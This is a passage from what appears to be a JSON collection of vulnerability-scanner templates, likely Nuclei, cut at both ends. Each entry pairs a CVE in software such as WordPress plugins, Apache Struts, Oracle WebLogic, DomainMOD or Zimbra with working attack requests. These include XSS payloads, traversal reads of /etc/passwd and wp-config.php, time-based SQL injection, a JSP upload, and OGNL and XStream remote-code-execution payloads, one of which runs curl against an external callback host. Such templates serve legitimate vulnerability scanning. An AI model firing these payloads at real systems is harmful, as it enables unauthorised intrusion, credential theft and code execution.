- Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCode 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-4063","info":{"name":"NewStatPress <0.9.9 - Cross-Site Scripting","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog=admin&pwd=admin123&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=<script>alert(document.domain)</script>&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, '<script>alert(document.domain)</script>') && contains(body_2, 'newstatpress')"],"condition":"and"}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1503","info":{"name":"IceWarp Mail Server <11.1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd","{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-1000012","info":{"name":"WordPress MyPixs <=0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2196","info":{"name":"WordPress Spider Calendar <=1.4.9 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"{\\\"status\\\":true,\\\"data\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2015-2068","info":{"name":"Magento Server Mass Importer - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N 